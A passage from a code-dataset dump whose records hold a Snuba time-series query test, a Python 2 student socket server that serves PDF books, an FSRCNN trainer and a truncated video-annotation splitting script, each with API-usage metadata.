"line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 154, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 155, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 155, "usage_type": "call"}, {"api_name": "seaborn.jointplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "attribute"}, {"api_name": 
"matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 166, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 167, "usage_type": "call"}, {"api_name": "read_write.determine_file_name_e1", "line_number": 172, "usage_type": "call"}, {"api_name": "read_write.write_contour", "line_number": 173, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 180, "usage_type": "call"}, {"api_name": "read_write.read_contour", "line_number": 181, "usage_type": "call"}, {"api_name": "contour_statistics.points_outside", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "plot.PlottedSample", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 197, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 205, "usage_type": "call"}, {"api_name": "plot.plot_contour", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}]} +{"seq_id": "270847276", "text": "from datetime import datetime, timedelta\nfrom typing import Any, MutableMapping, cast\n\nimport pytest\n\nfrom snuba import state\nfrom snuba.clickhouse.columns import ColumnSet\nfrom snuba.datasets.entities import EntityKey\nfrom snuba.query.conditions import (\n BooleanFunctions,\n ConditionFunctions,\n binary_condition,\n)\nfrom snuba.query.data_source.simple import Entity as QueryEntity\nfrom snuba.query.expressions import Column, Expression, Literal\nfrom snuba.query.logical import Query\nfrom snuba.query.timeseries_extension import TimeSeriesExtension\nfrom snuba.request.request_settings import HTTPRequestSettings\nfrom snuba.schemas import validate_jsonschema\n\n\ndef build_time_condition(\n time_columns: str, from_date: datetime, to_date: datetime\n) -> Expression:\n return binary_condition(\n BooleanFunctions.AND,\n binary_condition(\n ConditionFunctions.GTE,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, from_date),\n ),\n binary_condition(\n ConditionFunctions.LT,\n Column(f\"_snuba_{time_columns}\", None, time_columns),\n Literal(None, to_date),\n ),\n )\n\n\ntest_data = [\n (\n {\n \"from_date\": \"2019-09-19T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 19, 10), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n \"from_date\": \"1970-01-01T10:00:00\",\n \"to_date\": \"2019-09-19T12:00:00\",\n \"granularity\": 3600,\n },\n build_time_condition(\n \"timestamp\", datetime(2019, 9, 18, 12), datetime(2019, 9, 19, 12)\n ),\n 3600,\n ),\n (\n {\n 
\"from_date\": \"2019-09-19T10:05:30,1234\",\n \"to_date\": \"2019-09-19T12:00:34,4567\",\n },\n build_time_condition(\n \"timestamp\",\n datetime(2019, 9, 19, 10, 5, 30),\n datetime(2019, 9, 19, 12, 0, 34),\n ),\n 60,\n ),\n]\n\n\n@pytest.mark.parametrize(\n \"raw_data, expected_ast_condition, expected_granularity\", test_data,\n)\ndef test_query_extension_processing(\n raw_data: MutableMapping[str, Any],\n expected_ast_condition: Expression,\n expected_granularity: int,\n) -> None:\n state.set_config(\"max_days\", 1)\n extension = TimeSeriesExtension(\n default_granularity=60,\n default_window=timedelta(days=5),\n timestamp_column=\"timestamp\",\n )\n\n valid_data = validate_jsonschema(\n raw_data, cast(MutableMapping[str, Any], extension.get_schema())\n )\n query = Query(QueryEntity(EntityKey.EVENTS, ColumnSet([])))\n\n request_settings = HTTPRequestSettings()\n\n extension.get_processor().process_query(query, valid_data, request_settings)\n assert query.get_condition() == expected_ast_condition\n assert query.get_granularity() == expected_granularity\n", "sub_path": "tests/query/test_timeseries_extension.py", "file_name": "test_timeseries_extension.py", "file_ext": "py", "file_size_in_byte": 2985, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 25, "usage_type": "call"}, {"api_name": "snuba.query.conditions.BooleanFunctions.AND", "line_number": 26, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.BooleanFunctions", "line_number": 26, "usage_type": "name"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 27, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.GTE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 28, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 30, "usage_type": "call"}, {"api_name": "snuba.query.conditions.binary_condition", "line_number": 32, "usage_type": "call"}, {"api_name": "snuba.query.conditions.ConditionFunctions.LT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "snuba.query.conditions.ConditionFunctions", "line_number": 33, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Literal", "line_number": 35, "usage_type": "call"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "name"}, {"api_name": "snuba.query.expressions.Expression", "line_number": 83, "usage_type": "name"}, {"api_name": "snuba.state.set_config", "line_number": 86, "usage_type": "call"}, {"api_name": "snuba.state", "line_number": 86, "usage_type": "name"}, {"api_name": "snuba.query.timeseries_extension.TimeSeriesExtension", "line_number": 
87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "snuba.schemas.validate_jsonschema", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 94, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 94, "usage_type": "name"}, {"api_name": "snuba.query.logical.Query", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.query.data_source.simple.Entity", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.datasets.entities.EntityKey.EVENTS", "line_number": 96, "usage_type": "attribute"}, {"api_name": "snuba.datasets.entities.EntityKey", "line_number": 96, "usage_type": "name"}, {"api_name": "snuba.clickhouse.columns.ColumnSet", "line_number": 96, "usage_type": "call"}, {"api_name": "snuba.request.request_settings.HTTPRequestSettings", "line_number": 98, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "428771751", "text": "#Modulo servidor para el Proyecto 1 de Redes 1 Enero Marzo 2018\n#Integrantes: Salvador Gonzalez - 10-10296\n#\t\t\t Valentina Hernandez - 10-10352 \nfrom __future__ import print_function\nfrom time import sleep\nimport datetime as d\nimport os,signal\nimport sys\nimport socket as s\n\n#Funcion para listar las descargas completadas de los libros:\ndef listCompleted():\n\tprint()\n\ttry:\n\t\tfile = open(\"./Downladed_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tprint()\n\texcept:\n\t\tprint(\"No se han completado descargas todavia...\")\n#Funcion encargada de obtener la lista de todos los clientes que han consultado al servidor\ndef getClients():\n\tprint()\n\ttry:\n\t\tfile = open(\"./sessions.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tfile.close()\n\texcept:\n\t\tprint(\"El servidor todavia no ha sido consultado...\")\n#Funcion encargada de Mandarle la lista de los pdfs presentes en el servidor al cliente\n#@Param socket: cliente al cual se le enviara la informacion\ndef getBookList(socket):\n\tbooklist = os.listdir(\"./Pdfs\")\n\tfor book in booklist:\n\t\tsocket.send(book)\n\t\tsocket.send(\" \")\n\tsocket.send(\"#\")\n#Funcion para listar el numero de descargas x cliente y por libro\ndef listBookClient():\n\tocurrencias_c = {}#Diccionario para las ocurrencias de los clientes\n\tocurrencias_b = {}#Diccionario para las ocurrencias de los libros\n\tprint()\n\ttry:\n\t\tfile = open(\"./Client_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tclient,libro,nulo = line.split(\"-\")\n\t\t\tif client in ocurrencias_c:\n\t\t\t\tocurrencias_c[client] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_c[client] = 1\n\t\t\tif libro in ocurrencias_b:\n\t\t\t\tocurrencias_b[libro] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_b[libro] = 1\n\t\tprint(\"Numero de descargas por libro\")\n\t\tfor key in ocurrencias_b:\n\t\t\tprint(\"Libro: %s - Descargas: %s\"%(key,ocurrencias_b[key]))\n\t\tprint()\n\t\tprint(\"Numero de descargas por cliente\")\n\t\tfor key in ocurrencias_c:\n\t\t\tprint(\"Cliente: %s - Descargas: %s\"%(key,ocurrencias_c[key]))\n\texcept:\n\t\tprint(\"No se han realizado descargas en este servidor....\")\n#Funcion para listar las descargas en curso\ndef listDownloads():\n\tdownList = os.listdir(\"./Server_info\")\n\tif downList:\n\t\tfor download in downList:\n\t\t\tfile = 
open(\"./Server_info/%s\"%(download),\"r\")\n\t\t\tprint()\n\t\t\tprint(file.readline(),end=\"\")\n\t\t\tfile.close()\n\t\tprint()\n\telse:\n\t\tprint(\"\\nNo existen descargas en curso actualmente....\")\n#Funcion para el envio del alchivo al cliente\n#@Param socket: cliente al cual se le enviara el archivo\n#@Param info: informacion del cliente al cual se le enviara el pdf tupla (IP,PUERTO)\n#@Param pid: PID del proceso que envia el archivo para llevar el estatus de descarga\ndef sendBook(socket,info,pid):\n\tbook = socket.recv(200)#Variable para contener la informacion del libro (paquete de tamano fijo)\n\tbook = filter(lambda x: x!=\" \",book)#obtenemos el nombre\n\tfilesize = str(os.path.getsize(\"./Pdfs/%s\"%(book)))#Tamagno en bytes del archivo a enviar\n\twhile(len(filesize) < 10):\n\t\tfilesize+=\" \"\n\tsocket.send(filesize)\n\tfilesize = filter(lambda x: x != \" \",filesize)\n\t#Archivo que deseamos enviar\n\tfile = open(\"./Pdfs/%s\"%(book),\"r\")\n\tread = 0 #Variable para los bytes leidos\n\tdata = \" \"#Variable para guardar la data\n\twhile(data != \"\"):\n\t\t#Archivo para guardar el status de la descarga\n\t\tstatus = open(\"./Server_info/%s.txt\"%(pid),\"w\")\n\t\tdata = file.read(1000)\n\t\tread += len(data)\n\t\tsocket.send(data)\n\t\tstatus.write(\"CLiente: %s - Libro: %s - %s de %s bytes...\"%(info[0],book,read,filesize))\n\t\tstatus.close()\n\t\tsleep(3)\n\tfile.close()\n\tos.remove(\"./Server_info/%s.txt\"%(pid))\n\t#Si se completa la descarga/ anadimos el libro a la lista de descargas\n\tdate = d.datetime.now()\n\tfile = open(\"./Downladed_Books.txt\",\"a\")\n\tfile.write(\"Libro: %s - Fecha: %s-%s-%s - Hora: %s:%s:%s\\n\"%(book,date.day,date.month,date.year,date.hour,date.minute,date.second))\n\tfile.close()\n\t#Registro para el num de descargas x libro x cliente\n\tfile = open(\"./Client_Books.txt\",\"a\")\n\tfile.write(\"%s-%s-\\n\"%(info[0],book))\n\tfile.close()\n\ndef main():\n\tif (len(sys.argv) != 2):\n\t\tprint(\"La invocacion para el servidor debe ser de la forma: \",end=\"\")\n\t\tprint(\"python server.py \")\n\t\treturn\n\tport = sys.argv[1]#Numero de puerto para el socket\n\tserver_info = (\"\",int(port))#Informacion de nuestro servidor\n\t#la tupla contiene informacion referente a (Direccion Ip,Puerto de escucha)\n\t#Definimos el socket de para nuestro servidor\n\t#AF_INET y SOCK_STREAM son parametros para utilizar Protocolo TCP\n\t#AF_INET es para direcciones IPv4\n\tprint(\"Generando socket...\")\n\tsleep(1)\n\ttry:\n\t\tserver_socket = s.socket(s.AF_INET,s.SOCK_STREAM)\n\t\tprint(\"socket creado...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al generar el Socket para el servidor...\")\n\t\treturn\n\tprint(\"Asociando puerto %s al socket...\" % port)\n\tsleep(1)\n\ttry:\n\t\tserver_socket.bind(server_info)\n\t\tprint(\"Asociancion establecida...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al asociar el puerto al socket...\")\n\t\treturn\n\t#Creamos el directorio para la informacion del server:\n\ttry:\n\t\tos.mkdir(\"./Server_info\")\n\texcept:\n\t\tfiles = os.listdir(\"./Server_info\")\n\t\tfor file in files:\n\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t#Proceso hijo para la escuha de las peticiones\n\tconnection_handler = os.fork()\n\t#Codigo para el proceso hijo\n\tif connection_handler == 0:\n\t\t#Guardamos el PID del hijo para cerrarlo al finalizar el programa\n\t\tp_id = str(os.getpid())\n\t\tfile = open(\"./listen_process.txt\",\"w\")\n\t\tfile.write(p_id)\n\t\tfile.close()\n\t\twhile True:\n\t\t\t#Listen se encarga de escuchar las 
requests, the value 100 is the size of the queue\n\t\t\t#of requests the server can receive\n\t\t\tserver_socket.listen(100)\n\t\t\t#We wait to accept the clients' requests\n\t\t\t#client_info is a tuple of the form (IP,PORT)\n\t\t\tclient_socket,client_info = server_socket.accept()\n\t\t\t#We add the session\n\t\t\tfile = open(\"./sessions.txt\",\"a\")\n\t\t\tdate = d.datetime.now()\n\t\t\tfile.write(\"Cliente: %s Fecha: %s-%s-%s Hora: %s:%s:%s\\n\" %(client_info[0],date.day,date.month,date.year,date.hour,date.minute,date.second))\n\t\t\tfile.close()\n\t\t\t#A new fork is created to handle the requests once they have been heard\n\t\t\trequest_processor = os.fork()\n\t\t\t#Code for the child process in charge of handling/executing the requests\n\t\t\tif (request_processor == 0):\n\t\t\t\tp_id = str(os.getpid())\n\t\t\t\toption = client_socket.recv(1)\n\t\t\t\tif option == \"2\":\n\t\t\t\t\tgetBookList(client_socket)\n\t\t\t\telif option == \"3\":\n\t\t\t\t\tsendBook(client_socket,client_info,p_id)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\t\tquit()\n\t#code for the parent process - Main menu\n\telse:\n\t\toption = 0\n\t\twhile(option < 5):\n\t\t\tprint(\"\\nBienvenido al sistema de gestion del servidor... Que opcion desea ejecutar\")\n\t\t\tprint(\"1: LIBROS_DESCARGADOS\")\n\t\t\tprint(\"2: CLIENTES_QUE_CONSULTARON\")\n\t\t\tprint(\"3: NUM_DESCARGASxLIBROxCLIENTE\")\n\t\t\tprint(\"4: DESCARGAS_EN_CURSO\")\n\t\t\tprint(\"5: Salir...\")\n\t\t\toption = raw_input(\"Opcion: \")\n\t\t\tif option.isdigit():\n\t\t\t\toption = int(option)\n\t\t\t\t#Option for the list of completed downloads\n\t\t\t\tif option == 1:\n\t\t\t\t\tlistCompleted()\n\t\t\t\t#Option for the clients that have queried me\n\t\t\t\telif option == 2:\n\t\t\t\t\tgetClients()\n\t\t\t\telif option == 3:\n\t\t\t\t\tlistBookClient()\n\t\t\t\t#Option to list the downloads in progress\n\t\t\t\telif option == 4:\n\t\t\t\t\tlistDownloads()\n\t\t\t\t#Option to end the run\n\t\t\t\telif option == 5:\n\t\t\t\t\t#We close the server socket\n\t\t\t\t\tserver_socket.close()\n\t\t\t\t\t#We kill the listener process to free the port\n\t\t\t\t\tfile = open(\"./listen_process.txt\",\"r\")\n\t\t\t\t\tp_id = int(file.read())\n\t\t\t\t\tos.kill(p_id,signal.SIGKILL)\n\t\t\t\t\tos.remove(\"./listen_process.txt\")\n\t\t\t\t\t#We delete the contents of the Server_info folder\n\t\t\t\t\tinfo = os.listdir(\"./Server_info\")\n\t\t\t\t\tfor file in info:\n\t\t\t\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t\t\t\t\tos.rmdir(\"./Server_info\")\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\t\toption = 0\n\t\t\telse:\n\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\toption = 0\n\n\n\nif __name__ == '__main__':\n\tmain()", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 7875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 36, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 37, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 38, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "socket.recv", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 84, "usage_type": "attribute"}, {"api_name": "socket.send", "line_number": 87, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 128, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 128, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 128, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 135, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 145, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 147, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 149, "usage_type": "call"}, {"api_name": "os.fork", "line_number": 151, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.fork", "line_number": 172, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 175, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 215, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 216, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 218, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 220, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "473138363", "text": "import torch\nimport torch.backends.cudnn as cudnn\n\nfrom models.FSRCNN.model import Net\nfrom trainer import Trainer\n\n\nclass FSRCNNTrainer(Trainer):\n def __init__(self, config, training_loader, valid_loader):\n super(FSRCNNTrainer, self).__init__(config, training_loader, valid_loader, \"fsrcnn\")\n\n def build_model(self):\n self.model = Net(num_channels=3, upscale_factor=self.upscale_factor).to(self.device)\n self.model.weight_init(mean=0.0, std=0.2)\n self.criterion = torch.nn.MSELoss()\n torch.manual_seed(self.seed)\n\n if self.GPU_IN_USE:\n torch.cuda.manual_seed(self.seed)\n cudnn.benchmark = True\n self.criterion.cuda()\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[50, 75, 100], gamma=0.5) # lr decay\n", "sub_path": "models/FSRCNN/fsrcnn_trainer.py", "file_name": "fsrcnn_trainer.py", "file_ext": "py", "file_size_in_byte": 906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "trainer.Trainer", "line_number": 8, "usage_type": "name"}, {"api_name": "models.FSRCNN.model.Net", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 15, "usage_type": "call"}, 
{"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "230193758", "text": "import json\nimport random\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom os import makedirs, listdir\nfrom os.path import exists, join, isfile, basename\n\n\ndef ensure_dir_exists(dir_path):\n if not exists(dir_path):\n makedirs(dir_path)\n\n\ndef get_valid_sources(all_sources):\n return [s for s in all_sources if exists(s)]\n\n\ndef print_data_sources_stat(data_sources):\n print('Specified {} valid data sources:'.format(len(data_sources)))\n for data_source in data_sources:\n print(' - {}'.format(data_source))\n\n\ndef parse_records(data_sources):\n num_records = defaultdict(int)\n out_records = dict()\n for data_source in data_sources:\n data_type = basename(data_source).split('.')[0]\n\n with open(data_source) as input_stream:\n for line_id, line in enumerate(input_stream):\n if line_id == 0:\n continue\n\n line_elements = line.strip().split(',')\n if len(line_elements) != 4:\n continue\n\n label, video_name, start, end = line_elements\n\n segment_id = num_records[video_name]\n segment_name = f'{video_name}_segment{segment_id}'\n\n num_records[video_name] += 1\n out_records[segment_name] = dict(\n label=int(label),\n data_type=data_type\n )\n\n return out_records\n\n\ndef validate_videos(records, videos_dir, extension):\n downloaded_videos = set(\n f.replace(f'.{extension}', '')\n for f in listdir(videos_dir)\n if isfile(join(videos_dir, f)) and f.endswith(extension)\n )\n all_videos = set(video_name for video_name in records.keys())\n\n valid_videos = downloaded_videos & all_videos\n out_records = {video_name: records[video_name] for video_name in valid_videos}\n\n return out_records\n\n\ndef split_train_val_subsets(records, test_ratio=0.1):\n assert 0.0 < test_ratio < 1.0\n\n by_labels = defaultdict(list)\n for video_name, content in records.items():\n by_labels[content['label']].append(video_name)\n\n clustered_segments = dict()\n for label, segments in by_labels.items():\n videos = defaultdict(list)\n for segment in segments:\n video, _ = segment.split('_segment')\n videos[video].append(segment)\n\n clustered_segments[label] = videos\n\n out_records = dict()\n for label, videos in clustered_segments.items():\n num_records = len(by_labels[label])\n assert num_records > 1\n\n video_names = list(videos.keys())\n num_videos = len(video_names)\n assert num_videos > 1\n\n num_test_samples = min(num_records - 1, max(1, int(num_records * test_ratio)))\n num_test_videos = min(num_videos - 1, max(1, int(num_videos * test_ratio)))\n\n num_selected_test_samples = 0\n test_videos = []\n for test_video_name in random.sample(video_names, num_test_videos):\n test_videos.append(test_video_name)\n segments = videos[test_video_name]\n\n for segment in 
segments:\n out_records[segment] = dict(label=label, data_type='val')\n\n num_selected_test_samples += len(segments)\n if num_selected_test_samples >= num_test_samples:\n break\n\n train_videos = list(set(video_names) - set(test_videos))\n for train_video_name in train_videos:\n segments = videos[train_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='train')\n\n return out_records\n\n\ndef build_classmap(records):\n labels = set(record['label'] for record in records.values())\n return {class_name: i for i, class_name in enumerate(sorted(labels))}\n\n\ndef convert_annot(records, classmap, extension):\n out_records = dict()\n for video_name, content in records.items():\n label_id = classmap[content['label']]\n out_records[f'{video_name}.{extension}'] = label_id, content['data_type']\n\n return out_records\n\n\ndef group_by_type(annotation):\n out_data = defaultdict(list)\n for video_name, (label_id, data_type) in annotation.items():\n out_data[data_type].append((video_name, label_id))\n\n return out_data\n\n\ndef write_classmap(classmap, out_path):\n with open(out_path, 'w') as output_stream:\n json.dump(classmap, output_stream)\n\n\ndef write_annot(records, out_path):\n with open(out_path, 'w') as output_stream:\n for video_name, label_id in records:\n output_stream.write(f'{video_name} {label_id}\\n')\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--sources', '-s', nargs='+', type=str, required=True)\n parser.add_argument('--videos_dir', '-v', type=str, required=True)\n parser.add_argument('--output_dir', '-o', type=str, required=True)\n parser.add_argument('--extension', '-e', type=str, required=False, default='avi')\n parser.add_argument('--test_ratio', '-r', type=float, required=False, default=0.1)\n args = parser.parse_args()\n\n ensure_dir_exists(args.output_dir)\n\n data_sources = get_valid_sources(args.sources)\n print_data_sources_stat(data_sources)\n assert len(data_sources) > 0\n\n records = parse_records(data_sources)\n print(f'Found {len(records)} records.')\n\n classmap = build_classmap(records)\n print(f'Found {len(classmap)} unique classes.')\n\n out_classmap_path = join(args.output_dir, 'classmap.json')\n write_classmap(classmap, out_classmap_path)\n print(f'Dumped classmap to: {out_classmap_path}')\n\n records = validate_videos(records, args.videos_dir, args.extension)\n print(f'Validated {len(records)} videos.')\n\n records = split_train_val_subsets(records, args.test_ratio)\n\n annot = convert_annot(records, classmap, args.extension)\n split_annot = group_by_type(annot)\n\n for data_type, records in split_annot.items():\n out_annot_path = join(args.output_dir, f'{data_type}.txt')\n write_annot(records, out_annot_path)\n print(f'Dumped annot to: 